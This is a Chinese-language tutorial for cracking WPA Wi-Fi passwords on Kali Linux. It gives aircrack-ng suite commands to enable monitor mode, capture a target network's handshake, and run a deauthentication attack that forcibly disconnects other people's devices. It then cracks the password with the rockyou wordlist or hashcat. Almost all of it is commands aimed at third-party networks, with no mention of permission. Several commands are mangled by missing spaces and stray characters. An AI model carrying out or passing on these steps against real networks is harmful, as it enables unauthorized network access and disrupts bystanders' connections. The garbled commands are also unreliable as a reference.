前言準備
1:kali系統(tǒng)
2:網(wǎng)卡(能啟動ap功能)
3:字典(用于破解跑密碼使用)
開始
1
查看網(wǎng)卡是否支持監(jiān)聽模式
airmon-ng
wlan0代表我的網(wǎng)卡,也說明支持監(jiān)聽模式
2
開啟監(jiān)聽模式
airmon-ng?startwlan0
執(zhí)行成功之后網(wǎng)卡接口變?yōu)閣lan0mon;可以使用ifconfig命令查看
ifconfig
3
查看WiFi網(wǎng)絡
airodump-ng wlan0
此時,會列出了周圍的wifi和它們的詳細信息,包括信號強度、加密類型、頻道等。記住要破解wifi的頻道號和BSSID。按Ctrl-C結(jié)束
4
抓取握手包
airodump-ng wlan0mon
開始抓包
airodump-ng -c<頻道號>--bssid<目標>-w ~/01 wlan0mon
參數(shù)解釋
-c指定頻道號
–bssid指定路由器bssid
-w指定抓取的數(shù)據(jù)包保存位置
注意此處的空格
5
強制攻擊wifi的設備重新連接路由器
經(jīng)過步驟④,我們需要等用戶連接/重連接wifi,才能抓到包,此時,就可能需要很長時間,因為并比一定一定有新用戶連接此WiFi,所以,我們需要迫使用戶連接WiFi
打開新終端執(zhí)行
aireplay-ng -0?<攻擊次數(shù)>-a?<被攻擊AP的MAC>-c?<連接的設備>wlan0mon
參數(shù)解釋
-0表示發(fā)起deauthentication攻擊
-a指定無線路由器BSSID
-c指定強制斷開的設備
注意此處代碼空格。
如果成功,會如下圖
得到wpa?handshake后,按Ctrl-C結(jié)束
我們已經(jīng)得到了想要的握手包了,可以結(jié)束無線網(wǎng)卡的監(jiān)控模式
airmon-ng?stopwlan0mon
6
開始破解密碼
aircrack-ng- a2 -b <目標> -w /usr/share/wordlists/rockyou.txt~/*.cap
參數(shù)解釋
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
-最后是抓取的包。
然后就是等待了,可能幾分鐘,也可能幾個小時,這就根據(jù)電腦性能和密碼的復雜程度了。如果不成功,可使用其他字典,再破解
7
用hashcat破解
在線將cap轉(zhuǎn)為hccap格式
網(wǎng)址?https://hashcat.net/cap2hccapx/
用aircrack-ng把cap轉(zhuǎn)換成hccap類型數(shù)據(jù)包
aircrack-ng?<目標.cap>-J?<保存名字>
使用用hashcat破解WPA/PSK密碼
hashcat-m2500 名字hccap字典.txt
( -m 2500為破解的模式為WPA/PSK方式)